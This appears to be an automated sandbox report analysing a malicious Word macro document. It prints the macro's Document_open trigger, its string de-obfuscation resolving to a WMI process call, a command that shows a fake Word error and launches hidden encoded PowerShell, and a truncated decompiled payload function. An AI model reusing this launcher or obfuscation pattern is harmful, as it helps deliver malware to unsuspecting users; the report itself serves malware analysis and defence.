                                        Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process

                                        Replace([obfuscated command line],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD

                                        Ty8salh27qds_

                                        dwJWfYEzQ

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        vkAhEABKZ

                                        Close

                                        LXJdHABRP

                                        Strings | Decrypted Strings
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD"
                                        "MJtNyEaooLCJCF"
                                        "UqiKuFLuUFAG"
                                        "zErBUYAGeMPaGBPDC"
                                        "]a""nw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ"
                                        "aekFkFuGVeluWCH"
                                        "qsYNSviAFUkyhFd"
                                        "rWCJIFDWVfATR"
                                        Line | Instruction | Meta Information
                                        263 | Function Zacj6cs0xxmkchq(Sagq26te2gujbyg) |
                                        264 | Pn8s1r_n_tq7o5093 = Leedy8frqauxr | Leedy8frqauxr; executed
                                        265 | Goto RJCEFJhC |
                                        266 | Dim WcDDCTDnI as Object |
                                        267 | Set LqqhhpAQ = bzYfQcEHB | bzYfQcEHB
                                        268 | Set WcDDCTDnI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject
                                        269 | Dim RJCEFJhC as Object |
                                        270 | Set RJCEFJhC = WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD") | CreateTextFile
                                        271 | RJCEFJhC.WriteLine "MJtNyEaooLCJCF" | WriteLine
                                        272 | RJCEFJhC.WriteLine "UqiKuFLuUFAG" | WriteLine
                                        273 | RJCEFJhC.WriteLine "zErBUYAGeMPaGBPDC" | WriteLine
                                        274 | Set oTwTJAJ = xZGeAsHP | xZGeAsHP
                                        275 | RJCEFJhC.Close | Close
                                        276 | Set WcDDCTDnI = Nothing |
                                        277 | Set sHovtYJn = naqcFCA | naqcFCA
                                        278 | Set RJCEFJhC = Nothing |
                                        278 | RJCEFJhC: |
                                        280 | Zacj6cs0xxmkchq = Replace(Sagq26te2gujbyg, "]a" + "nw[3", Ty8salh27qds_) | Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process; Ty8salh27qds_; executed
                                        281 | Goto ZYnQf |
                                        282 | Dim GUUgA as Object |
                                        283 | Set PRsSHBf = dwJWfYEzQ | dwJWfYEzQ
                                        284 | Set GUUgA = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject
                                        285 | Dim ZYnQf as Object |
                                        286 | Set ZYnQf = GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ") | CreateTextFile
                                        287 | ZYnQf.WriteLine "aekFkFuGVeluWCH" | WriteLine
                                        288 | ZYnQf.WriteLine "qsYNSviAFUkyhFd" | WriteLine
                                        289 | ZYnQf.WriteLine "rWCJIFDWVfATR" | WriteLine
                                        290 | Set XJUEA = vkAhEABKZ | vkAhEABKZ
                                        291 | ZYnQf.Close | Close
                                        292 | Set GUUgA = Nothing |
                                        293 | Set EjrLDNGq = LXJdHABRP | LXJdHABRP
                                        294 | Set ZYnQf = Nothing |
                                        294 | ZYnQf: |
                                        296 | End Function |

                                        Module: Larj61e5m5vzwh77

                                        Declaration
                                        Line | Content
                                        1 | Attribute VB_Name = "Larj61e5m5vzwh77"

                                        Module: Teh9tkv0p83u4g

                                        Declaration
                                        Line | Content
                                        1 | Attribute VB_Name = "Teh9tkv0p83u4g"
                                        2 | Attribute VB_Base = "1Normal.ThisDocument"
                                        3 | Attribute VB_GlobalNameSpace = False
                                        4 | Attribute VB_Creatable = False
                                        5 | Attribute VB_PredeclaredId = True
                                        6 | Attribute VB_Exposed = True
                                        7 | Attribute VB_TemplateDerived = True
                                        8 | Attribute VB_Customizable = True

                                        Executed Functions
                                        APIs | Meta Information

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Xj1p0_yor4q8g

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Item

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Gdmbhv991jtvgzq

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: hlEyDCTAH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: eHrGyvyM

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: cVkLD

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: tIaWTAJA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: PvcTcFOF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: chutdOAFs

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: XhUYUbSBA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: pzqeBGIAH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: TbHJC

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: eBvGf

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: bYwGEijH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: uvgvJGfI

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Mid

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Name

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Application

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: rINmB

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: iOplaUSwB

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: kUseBAG

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: qdDeFbDk

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: UbNkCZ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: fMPBmQ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: sbLwDeWJ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: JjBKEUXqH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: GEopA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: BuEcDJvc

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: JkICEEJbA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: hrqzdCF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Mid

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Len

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: SYgbDdCEH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: IuDSasFIm

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: LUJoKCCQ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: xDUMl

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: TFPJDBSa

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: hKDFekFGF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Create

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: L_4bpvggv2vokj75

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Nakuayuxnnrg5

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: IYlnG

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: nEFlbEa

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: ClgfEDCg

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: UcUhFvH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: ncXeGEGfF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: kIALACE

                                        Line | Instruction | Meta Information
                                        9 | Private Sub Document_open() |
                                        10 | Rvpv59xrvp7m2wb | executed
                                        11 | End Sub |


                                          Executed Functions

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2101081354.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3159b56ee96a83b47551ce1e64fce265b3b8c5cb1ee71831d339ab84b9cdacf6
                                          • Instruction ID: b7dc6a4da6378cb8d6465de2a0adc6e74d62de6161e021fa59abceacf53281f9
                                          • Opcode Fuzzy Hash: 3159b56ee96a83b47551ce1e64fce265b3b8c5cb1ee71831d339ab84b9cdacf6
                                          • Instruction Fuzzy Hash: 22518E5291EBC65FE7075B389C656A07FB0EF27211F4A40E7D088CB0E3E95C9959C362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 97%
                                          			E006C2C63() {
                                          				char _v68;
                                          				signed int _v72;
                                          				char _v80;
                                          				char _v88;
                                          				intOrPtr _v92;
                                          				intOrPtr _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				void* _v112;
                                          				signed int _v116;
                                          				char _v124;
                                          				char _v132;
                                          				char _v140;
                                          				char _v144;
                                          				signed int _v148;
                                          				void* _v152;
                                          				void* _v156;
                                          				signed int _v160;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v172;
                                          				signed int _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				signed int _v188;
                                          				signed int _v192;
                                          				signed int _v196;
                                          				signed int _v200;
                                          				signed int _v204;
                                          				signed int _v208;
                                          				signed int _v212;
                                          				signed int _v216;
                                          				unsigned int _v220;
                                          				signed int _v224;
                                          				signed int _v228;
                                          				signed int _v232;
                                          				signed int _v236;
                                          				signed int _v240;
                                          				signed int _v244;
                                          				unsigned int _v248;
                                          				signed int _v252;
                                          				signed int _v256;
                                          				signed int _v260;
                                          				signed int _v264;
                                          				signed int _v268;
                                          				unsigned int _v272;
                                          				signed int _v276;
                                          				signed int _v280;
                                          				signed int _v284;
                                          				signed int _v288;
                                          				signed int _v292;
                                          				signed int _v296;
                                          				signed int _v300;
                                          				signed int _v304;
                                          				signed int _v308;
                                          				signed int _v312;
                                          				signed int _v316;
                                          				signed int _v320;
                                          				signed int _v324;
                                          				signed int _v328;
                                          				signed int _v332;
                                          				signed int _v336;
                                          				signed int _v340;
                                          				unsigned int _v344;
                                          				signed int _v348;
                                          				signed int _v352;
                                          				signed int _v356;
                                          				signed int _v360;
                                          				signed int _v364;
                                          				signed int _v368;
                                          				signed int _v372;
                                          				signed int _v376;
                                          				signed int _v380;
                                          				signed int _v384;
                                          				signed int _v388;
                                          				signed int _v392;
                                          				unsigned int _v396;
                                          				signed int _v400;
                                          				signed int _v404;
                                          				signed int _v408;
                                          				signed int _v412;
                                          				signed int _v416;
                                          				signed int _v420;
                                          				signed int _v424;
                                          				signed int _v428;
                                          				signed int _v432;
                                          				signed int _v436;
                                          				signed int _v440;
                                          				signed int _v444;
                                          				signed int _v448;
                                          				signed int _v452;
                                          				signed int _v456;
                                          				signed int _v460;
                                          				signed int _v464;
                                          				signed int _v468;
                                          				signed int _v472;
                                          				signed int _v476;
                                          				signed int _v480;
                                          				signed int _v484;
                                          				signed int _v488;
                                          				signed int _v492;
                                          				signed int _v496;
                                          				signed int _v500;
                                          				signed int _v504;
                                          				signed int _v508;
                                          				signed int _v512;
                                          				unsigned int _v516;
                                          				signed int _v520;
                                          				signed int _v524;
                                          				signed int _v528;
                                          				signed int _v532;
                                          				signed int _v536;
                                          				signed int _v540;
                                          				unsigned int _v544;
                                          				signed int _v548;
                                          				signed int _v552;
                                          				signed int _v556;
                                          				signed int _v560;
                                          				signed int _v564;
                                          				signed int _v568;
                                          				signed int _v572;
                                          				unsigned int _v576;
                                          				signed int _v580;
                                          				signed int _v584;
                                          				unsigned int _v588;
                                          				signed int _v592;
                                          				unsigned int _v596;
                                          				signed int _v600;
                                          				signed int _t1135;
                                          				signed int _t1138;
                                          				signed int _t1140;
                                          				signed int _t1144;
                                          				signed int _t1172;
                                          				void* _t1186;
                                          				signed int _t1199;
                                          				void* _t1213;
                                          				signed int _t1218;
                                          				signed int _t1224;
                                          				signed int _t1257;
                                          				signed int _t1336;
                                          				signed int _t1340;
                                          				signed int _t1348;
                                          				signed int _t1351;
                                          				signed int _t1352;
                                          				signed int _t1353;
                                          				signed int _t1354;
                                          				signed int _t1355;
                                          				signed int _t1356;
                                          				signed int _t1357;
                                          				signed int _t1358;
                                          				signed int _t1359;
                                          				signed int _t1360;
                                          				signed int _t1361;
                                          				signed int _t1362;
                                          				signed int _t1363;
                                          				signed int _t1364;
                                          				signed int _t1365;
                                          				signed int _t1366;
                                          				signed int _t1367;
                                          				signed int _t1368;
                                          				signed int _t1369;
                                          				signed int _t1370;
                                          				signed int _t1371;
                                          				signed int _t1372;
                                          				void* _t1384;
                                          				signed int _t1385;
                                          				void* _t1387;
                                          				void* _t1389;
                                          				void* _t1391;
                                          				void* _t1392;
                                          				void* _t1393;
                                          
                                          				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
                                          				_v596 = 0x54d1;
                                          				_t1225 = 0x2a32d0a;
                                          				_t1351 = 0x66;
                                          				_v596 = _v596 / _t1351;
                                          				_t1352 = 0x6b;
                                          				_v596 = _v596 / _t1352;
                                          				_v596 = _v596 >> 4;
                                          				_v596 = _v596 ^ 0x00002830;
                                          				_v416 = 0xcdcb;
                                          				_v416 = _v416 + 0x2116;
                                          				_t1353 = 0x1f;
                                          				_v416 = _v416 * 0x30;
                                          				_v416 = _v416 ^ 0x002c9323;
                                          				_v488 = 0x9982;
                                          				_v488 = _v488 | 0x10c88477;
                                          				_v488 = _v488 ^ 0xa41c88c2;
                                          				_v488 = _v488 / _t1353;
                                          				_v488 = _v488 ^ 0x05d51165;
                                          				_v496 = 0x77c8;
                                          				_v496 = _v496 >> 3;
                                          				_t1354 = 0xa;
                                          				_v496 = _v496 / _t1354;
                                          				_v496 = _v496 << 7;
                                          				_v496 = _v496 ^ 0x0000cb31;
                                          				_v232 = 0x48c9;
                                          				_v232 = _v232 << 0xe;
                                          				_v232 = _v232 ^ 0x12321472;
                                          				_v360 = 0x3c3d;
                                          				_t1218 = 5;
                                          				_v360 = _v360 / _t1218;
                                          				_v360 = _v360 * 0x2f;
                                          				_v360 = _v360 ^ 0x000268e3;
                                          				_v176 = 0x1856;
                                          				_v176 = _v176 * 0x70;
                                          				_v176 = _v176 ^ 0x000ab2a8;
                                          				_v264 = 0xa86e;
                                          				_v264 = _v264 + 0xffff13b3;
                                          				_v264 = _v264 ^ 0xffffefbf;
                                          				_v376 = 0x5423;
                                          				_v376 = _v376 + 0xffffd432;
                                          				_v376 = _v376 | 0x32249576;
                                          				_v376 = _v376 ^ 0x3224c778;
                                          				_v248 = 0xe66f;
                                          				_v248 = _v248 >> 9;
                                          				_v248 = _v248 ^ 0x000023ba;
                                          				_v308 = 0x205b;
                                          				_v308 = _v308 + 0xffff1f5e;
                                          				_v308 = _v308 << 8;
                                          				_v308 = _v308 ^ 0xff3fb884;
                                          				_v484 = 0x592;
                                          				_v484 = _v484 + 0xffffd519;
                                          				_v484 = _v484 | 0x759ff25f;
                                          				_v484 = _v484 + 0x87eb;
                                          				_v484 = _v484 ^ 0x00008574;
                                          				_v168 = 0x6ddb;
                                          				_v168 = _v168 | 0x6e943d07;
                                          				_v168 = _v168 ^ 0x6e944d9a;
                                          				_v200 = 0xd6b0;
                                          				_v200 = _v200 + 0xffff46fa;
                                          				_v200 = _v200 ^ 0x00002650;
                                          				_v452 = 0x246b;
                                          				_v452 = _v452 ^ 0x586b7630;
                                          				_v452 = _v452 << 0xc;
                                          				_v452 = _v452 + 0xd57e;
                                          				_v452 = _v452 ^ 0xb526cd97;
                                          				_v348 = 0xfa69;
                                          				_t1340 = 0x52;
                                          				_t1355 = 0x65;
                                          				_v348 = _v348 * 0x65;
                                          				_v348 = _v348 | 0xab757825;
                                          				_v348 = _v348 ^ 0xab77a96f;
                                          				_v324 = 0xa741;
                                          				_v324 = _v324 ^ 0x4f747397;
                                          				_v324 = _v324 / _t1340;
                                          				_v324 = _v324 ^ 0x00f83cd8;
                                          				_v296 = 0x788d;
                                          				_v296 = _v296 ^ 0x0ef2968d;
                                          				_v296 = _v296 ^ 0x495ddb9a;
                                          				_v296 = _v296 ^ 0x47af2616;
                                          				_v220 = 0xb89f;
                                          				_v220 = _v220 >> 0xb;
                                          				_v220 = _v220 ^ 0x000056af;
                                          				_v520 = 0x12ce;
                                          				_v520 = _v520 + 0xe747;
                                          				_v520 = _v520 << 7;
                                          				_v520 = _v520 | 0x5b07959e;
                                          				_v520 = _v520 ^ 0x5b7fa869;
                                          				_v208 = 0xa95c;
                                          				_v208 = _v208 + 0xffff5ee2;
                                          				_v208 = _v208 ^ 0x00000a9e;
                                          				_v172 = 0xa2eb;
                                          				_v172 = _v172 * 0x79;
                                          				_v172 = _v172 ^ 0x004d63d4;
                                          				_v180 = 0x98a7;
                                          				_v180 = _v180 | 0x8ae8094c;
                                          				_v180 = _v180 ^ 0x8ae8e600;
                                          				_v424 = 0xd5a0;
                                          				_v424 = _v424 << 5;
                                          				_v424 = _v424 / _t1355;
                                          				_v424 = _v424 ^ 0x00007145;
                                          				_v392 = 0x548d;
                                          				_v392 = _v392 + 0xffff9ec2;
                                          				_v392 = _v392 + 0xffffa1fb;
                                          				_v392 = _v392 ^ 0xffff9dba;
                                          				_v340 = 0x6e45;
                                          				_t1356 = 0x16;
                                          				_v340 = _v340 / _t1356;
                                          				_v340 = _v340 + 0xffff4bce;
                                          				_v340 = _v340 ^ 0xffff3c02;
                                          				_v536 = 0xbde4;
                                          				_v536 = _v536 * 0x7f;
                                          				_v536 = _v536 ^ 0x574a5eba;
                                          				_v536 = _v536 << 0xd;
                                          				_v536 = _v536 ^ 0x8d54c30e;
                                          				_v284 = 0x7ef6;
                                          				_v284 = _v284 + 0x9ef0;
                                          				_v284 = _v284 ^ 0x00015c31;
                                          				_v408 = 0xc211;
                                          				_v408 = _v408 ^ 0x3543d7c0;
                                          				_v408 = _v408 * 0x2b;
                                          				_v408 = _v408 ^ 0xf244fbb0;
                                          				_v588 = 0x856b;
                                          				_v588 = _v588 ^ 0xfc1cd259;
                                          				_v588 = _v588 ^ 0x7d294751;
                                          				_v588 = _v588 >> 0xe;
                                          				_v588 = _v588 ^ 0x000240de;
                                          				_v508 = 0x646a;
                                          				_t1357 = 0x1e;
                                          				_v508 = _v508 / _t1357;
                                          				_t1358 = 0x35;
